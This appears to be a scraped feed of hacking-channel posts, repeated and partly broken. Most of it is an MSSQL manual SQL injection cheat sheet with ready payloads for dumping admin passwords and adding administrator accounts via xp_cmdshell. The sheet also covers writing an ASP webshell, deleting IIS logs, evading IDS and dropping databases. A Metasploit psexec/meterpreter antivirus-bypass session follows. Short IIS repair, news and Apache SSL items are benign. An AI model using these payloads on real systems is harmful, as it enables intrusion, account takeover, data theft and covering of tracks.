π¦SQL manual injection statement & SQL manual injection Daquan
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. There is no filter parameter'and
[query condition] and'%25 when searching '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- View the contents of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ represents character type, and REG_DWORD represents integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' delete key, including all values ββunder this key
14. mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
π¦SQL manual injection statement & SQL manual injection Daquan
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. There is no filter parameter'and
[query condition] and'%25 when searching '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- View the contents of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ represents character type, and REG_DWORD represents integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' delete key, including all values ββunder this key
14. mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
15.mssql built-in function
; and (select @@version)>0 to obtain the version number of Windows
; and user_name()='dbo' to determine the current Is the system's connected user sa
; and (select user_name())>0 explodes the current system's connected user
; and (select db_name())>0 gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ('');
backup database model to disk='g:\wwwtest\l.asp'; When
requesting, use it like this:
http://ip/l.asp ?c=dir
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
; and (select @@version)>0 to obtain the version number of Windows
; and user_name()='dbo' to determine the current Is the system's connected user sa
; and (select user_name())>0 explodes the current system's connected user
; and (select db_name())>0 gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ('');
backup database model to disk='g:\wwwtest\l.asp'; When
requesting, use it like this:
http://ip/l.asp ?c=dir
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
π¦HACKING WEBSITE EXAMPLE BY UNDERCODE :
#expertsTips
βββSplit
SQL Server to
determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6β²
http:// www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article. asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user data information:
article.asp?id=6 having 1=1β
columns in the current table:
article.asp?id=6 group by admin.username having 1=1β
article.asp?id=6 group by admin.username,admin.password having 1=1β
any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
Storm database data:
and (select top 1 password from admin where id=N)>1
Modify the data in the database:
;update admin set password='oooooo' where username='xxx'
Add data in the database:
;insert into admin values ββ(xxx, oooooo)βDelete
database:
;drop database webdata to
obtain the current database user name: and user>0 to
obtain the current database name: and db_name()>0 to
obtain the database version: and (select @@version)>0 to
determine whether multiple sentence queries are supported : ;Declare @a intβ
Determine whether to support sub-queries: and (select count(1) from [sysobjects])>=0
Extended stored procedures of the database: exec master..xp_cmdshell to
view the server C drive directory: ;exec_master..xp_cmdshell'dir c:\' to
determine Does the extended stored procedure exist: and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' to
restore the extended stored procedure:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
delete the extended stored procedure: ;exec sp_dropextendedproc'xp_cmdshell'
provides some functions in MSSQL2000 for accessing OLE objects indirectly to obtain permissions:
;declare @s int
;exec sp_oacreat'wscript.shell',@s
;exec master..spoamethod @s,'run' ,null,'cmd.exe/c dir c:\' to
determine whether the current database user name has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
and 1=(select is_member('db_owner'))
stores all database information in the SQLSERVER database system in the master.dbo.sysdatabases table of SQLSERVER. You only need PUBLIC permissions to perform SELECT operations on this table:
and (select top 1 name from master. dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
delete log records:
;exec master.dbo.xp_cmdshell'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt' to
replace the log record:
; exec master.dbo.xp_cmdshell 'copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Get Path WEB:
; declare @shell int
;exec master..sp_oamethod'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /sd:/index.asp >c :/log.txt
Use XP_CMDSHELL to search:
;exec master..xp_cmdshell'dir /sd:/index.asp'
command to display server website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc /1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permission:
;exec master.dbo.xp_regread
π¦HACKING WEBSITE EXAMPLE BY UNDERCODE :
#expertsTips
βββSplit
SQL Server to
determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6β²
http:// www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article. asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user data information:
article.asp?id=6 having 1=1β
columns in the current table:
article.asp?id=6 group by admin.username having 1=1β
article.asp?id=6 group by admin.username,admin.password having 1=1β
any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
Storm database data:
and (select top 1 password from admin where id=N)>1
Modify the data in the database:
;update admin set password='oooooo' where username='xxx'
Add data in the database:
;insert into admin values ββ(xxx, oooooo)βDelete
database:
;drop database webdata to
obtain the current database user name: and user>0 to
obtain the current database name: and db_name()>0 to
obtain the database version: and (select @@version)>0 to
determine whether multiple sentence queries are supported : ;Declare @a intβ
Determine whether to support sub-queries: and (select count(1) from [sysobjects])>=0
Extended stored procedures of the database: exec master..xp_cmdshell to
view the server C drive directory: ;exec_master..xp_cmdshell'dir c:\' to
determine Does the extended stored procedure exist: and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' to
restore the extended stored procedure:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
delete the extended stored procedure: ;exec sp_dropextendedproc'xp_cmdshell'
provides some functions in MSSQL2000 for accessing OLE objects indirectly to obtain permissions:
;declare @s int
;exec sp_oacreat'wscript.shell',@s
;exec master..spoamethod @s,'run' ,null,'cmd.exe/c dir c:\' to
determine whether the current database user name has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
and 1=(select is_member('db_owner'))
stores all database information in the SQLSERVER database system in the master.dbo.sysdatabases table of SQLSERVER. You only need PUBLIC permissions to perform SELECT operations on this table:
and (select top 1 name from master. dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
delete log records:
;exec master.dbo.xp_cmdshell'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt' to
replace the log record:
; exec master.dbo.xp_cmdshell 'copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Get Path WEB:
; declare @shell int
;exec master..sp_oamethod'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /sd:/index.asp >c :/log.txt
Use XP_CMDSHELL to search:
;exec master..xp_cmdshell'dir /sd:/index.asp'
command to display server website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc /1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permission:
;exec master.dbo.xp_regread
hkey_local_machine,
'system\currentcontrolset\services\ w3svc\parameters\virtual roots\'
'/'
Advanced technology under SQLSERVER can refer to the fifth chapter of Script Hacker by Zeng Yunhao.
3. DSqlHelper
detects authority SYSADMIN:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, db_owner.
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master .dbo.sysobjects WHERE name='xp_regread')
check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
check SP_ADDEXTENDEDPROC:
and 1=(SELECT count( *) FROM master.dbo.sysobjects WHERE name ='sp_addextendedproc')
detect XP_SUBDIRS read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
content:
; the UPDATE table set field contents = =. 1. 1 WHERE
XP_CMDSHELL detection:
; Exec master..xp_cmdshell 'the dir C: \'
repair XP_CMDSHELL:
; Exec master.dbo.sp_addextendedproc 'the xp_cmdshell', 'Xplog70.dll'
with XP_CMDSHELL add user hacker:
;exec master.dbo.xp_cmdshell'net user hacker 123456 /add'
XP_CMDSHELL add user hacker to ADMIN group:
;exec master.dbo.xp_cmdshell'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
test table segment test:
and exists (select * from test)
Read the location of WEB (read the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);-
the absolute path of WEB burst (error mode):
and 1=(select count(*) from test where dstr> 1)
delete table test:
;drop table test ;
βCreate table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the contents of the viewing directories to table dirs:
;insert dirs exec master.dbo.xp_dirtree'c:\'
explode the contents of the directory dirs:
and 0<>(select top 1 paths from dirs)
Backup database DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak' ;
βDrop table dirs:
;drop table dirs;βCreate
table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));β
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;β
Delete table temp:
;delete from temp;
βcreate table dirs:
;create table dirs(paths varchar(100), id int);β
get subdirectory list XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs'c:\' ;
βBroken content (error mode):
and 0<>(select top 1 paths from dirs)
delete table dirs:
;delete from dirs;
βcreate table dirs:
;create table dirs(paths varchar(100), id int )
-Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell'dir c:\'
delete table dirs:
;delete from dirs;
-check SP_OAcreate (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
SP_OAcreate executes CMD command:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run ',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OAcreate creates a directory:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,' run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory E disk:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to Readable:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' to
'system\currentcontrolset\services\ w3svc\parameters\virtual roots\'
'/'
Advanced technology under SQLSERVER can refer to the fifth chapter of Script Hacker by Zeng Yunhao.
3. DSqlHelper
detects authority SYSADMIN:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, db_owner.
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master .dbo.sysobjects WHERE name='xp_regread')
check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
check SP_ADDEXTENDEDPROC:
and 1=(SELECT count( *) FROM master.dbo.sysobjects WHERE name ='sp_addextendedproc')
detect XP_SUBDIRS read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
content:
; the UPDATE table set field contents = =. 1. 1 WHERE
XP_CMDSHELL detection:
; Exec master..xp_cmdshell 'the dir C: \'
repair XP_CMDSHELL:
; Exec master.dbo.sp_addextendedproc 'the xp_cmdshell', 'Xplog70.dll'
with XP_CMDSHELL add user hacker:
;exec master.dbo.xp_cmdshell'net user hacker 123456 /add'
XP_CMDSHELL add user hacker to ADMIN group:
;exec master.dbo.xp_cmdshell'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
test table segment test:
and exists (select * from test)
Read the location of WEB (read the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);-
the absolute path of WEB burst (error mode):
and 1=(select count(*) from test where dstr> 1)
delete table test:
;drop table test ;
βCreate table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the contents of the viewing directories to table dirs:
;insert dirs exec master.dbo.xp_dirtree'c:\'
explode the contents of the directory dirs:
and 0<>(select top 1 paths from dirs)
Backup database DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak' ;
βDrop table dirs:
;drop table dirs;βCreate
table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));β
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;β
Delete table temp:
;delete from temp;
βcreate table dirs:
;create table dirs(paths varchar(100), id int);β
get subdirectory list XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs'c:\' ;
βBroken content (error mode):
and 0<>(select top 1 paths from dirs)
delete table dirs:
;delete from dirs;
βcreate table dirs:
;create table dirs(paths varchar(100), id int )
-Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell'dir c:\'
delete table dirs:
;delete from dirs;
-check SP_OAcreate (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
SP_OAcreate executes CMD command:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run ',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OAcreate creates a directory:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,' run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory E disk:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to Readable:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' to
start SERVER service:
;exec master..xp_servicecontrol'start','server'
bypass IDS detection XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @ a'dir c:\ '
Open remote database 1
:; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1' )
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB ','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table'
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
;exec master..xp_servicecontrol'start','server'
bypass IDS detection XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @ a'dir c:\ '
Open remote database 1
:; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1' )
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB ','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table'
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
A penetration tester's guide to sub-domain enumeration.pdf
A penetration tester's guide to subdomain enumeration
for beginners
π¦Fix a hacked host - IIS short file name repair methods:
> Consolidated notes and repair plan:
Turn off NTFS 8.3 short file name generation. This feature is enabled by default, and most users do not need it.
If you are on shared (virtual) hosting, ask the hosting provider to apply the fix. Vulnerability description: the IIS short file name disclosure vulnerability is a file-enumeration weakness in the IIS implementation; an attacker can use it to enumerate and discover files and directories under the server's web root.
1. Set the following registry value to 1 (a server restart is required for the change to take effect):
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation
Note that this only stops new 8.3 short names from being generated; short names that already exist remain until the files are recreated (see step 5).
2. Alternatively, run the following command from an administrative command prompt: fsutil behavior set disable8dot3 1
3. If your web environment does not require ASP.NET support, open Internet Information Services (IIS) Manager -> Web Service Extensions -> ASP.NET and disable it.
4. Upgrade the .NET Framework to version 4.0 or higher.
5. Recreate the existing IIS content directory and redeploy; completing this step is what makes the repair complete.
Copy the contents of the web folder to another location (for example D:\www to D:\www.back), delete the original folder D:\www, then rename D:\www.back to D:\www. Short names that were already generated persist until the files are copied afresh, so if you skip this copy the existing short file names will not disappear.
After these steps were applied, a security/penetration rescan found no IIS short file name vulnerabilities.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
π¦Fix a hacked host - IIS short file name repair methods:
> Consolidated notes and repair plan:
Turn off NTFS 8.3 short file name generation. This feature is enabled by default, and most users do not need it.
If you are on shared (virtual) hosting, ask the hosting provider to apply the fix. Vulnerability description: the IIS short file name disclosure vulnerability is a file-enumeration weakness in the IIS implementation; an attacker can use it to enumerate and discover files and directories under the server's web root.
1. Set the following registry value to 1 (a server restart is required for the change to take effect):
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation
Note that this only stops new 8.3 short names from being generated; short names that already exist remain until the files are recreated (see step 5).
2. Alternatively, run the following command from an administrative command prompt: fsutil behavior set disable8dot3 1
3. If your web environment does not require ASP.NET support, open Internet Information Services (IIS) Manager -> Web Service Extensions -> ASP.NET and disable it.
4. Upgrade the .NET Framework to version 4.0 or higher.
5. Recreate the existing IIS content directory and redeploy; completing this step is what makes the repair complete.
Copy the contents of the web folder to another location (for example D:\www to D:\www.back), delete the original folder D:\www, then rename D:\www.back to D:\www. Short names that were already generated persist until the files are copied afresh, so if you skip this copy the existing short file names will not disappear.
After these steps were applied, a security/penetration rescan found no IIS short file name vulnerabilities.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
π¦Twitter, wary of being investigated again, proactively reports hacking incident to the EU
#NEWS
> Sina Technology News, evening of July 22, Beijing time: according to foreign media reports, a few days after the worst security breach in the company's history, Twitter took the initiative to report the incident to the EU data protection agency.
> Graham Doyle, spokesperson for the Irish Data Protection Commission (DPC), the EU data protection agency, said today that the regulator has received notification of the incident. The DPC is the lead regulator for Twitter and other American technology companies in the European Union, because these companies have their European headquarters in Ireland.
> Twitter is currently working hard to deal with this, its most serious security incident. Twitter announced on Wednesday night that, by gaining control of Twitter employee credentials, hackers had hijacked accounts including those of Democratic presidential candidate Joe Biden, former President Barack Obama, reality TV star Kim Kardashian, and tech billionaire and Tesla founder Elon Musk.
> Twitter later stated that the hackers targeted 130 accounts, took control of 45 of them by resetting their passwords, and posted tweets from them. Twitter also confirmed that the attackers successfully manipulated a small number of employees and used their credentials to access Twitter's internal systems.
> In May 2018, the EU's new data privacy regulation, the General Data Protection Regulation (GDPR), came into effect. In October of the same year, Twitter was investigated over user data tracking in Europe; that was the first investigation Twitter faced after the GDPR took effect. (Li Ming)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
π¦Twitter, wary of being investigated again, proactively reports hacking incident to the EU
#NEWS
> Sina Technology News, evening of July 22, Beijing time: according to foreign media reports, a few days after the worst security breach in the company's history, Twitter took the initiative to report the incident to the EU data protection agency.
> Graham Doyle, spokesperson for the Irish Data Protection Commission (DPC), the EU data protection agency, said today that the regulator has received notification of the incident. The DPC is the lead regulator for Twitter and other American technology companies in the European Union, because these companies have their European headquarters in Ireland.
> Twitter is currently working hard to deal with this, its most serious security incident. Twitter announced on Wednesday night that, by gaining control of Twitter employee credentials, hackers had hijacked accounts including those of Democratic presidential candidate Joe Biden, former President Barack Obama, reality TV star Kim Kardashian, and tech billionaire and Tesla founder Elon Musk.
> Twitter later stated that the hackers targeted 130 accounts, took control of 45 of them by resetting their passwords, and posted tweets from them. Twitter also confirmed that the attackers successfully manipulated a small number of employees and used their credentials to access Twitter's internal systems.
> In May 2018, the EU's new data privacy regulation, the General Data Protection Regulation (GDPR), came into effect. In October of the same year, Twitter was investigated over user data tracking in Europe; that was the first investigation Twitter faced after the GDPR took effect. (Li Ming)
π¦AVBypass :
Generate executable using Veil.enjoyβ€οΈππ»
2) In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit
π¦BUILD YOUR OWN ApacheSSL:
# Enabling self-signed certificates on a local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate a self-signed SSL certificate and its private key:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Enable the default-ssl site by creating a symbolic link:
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
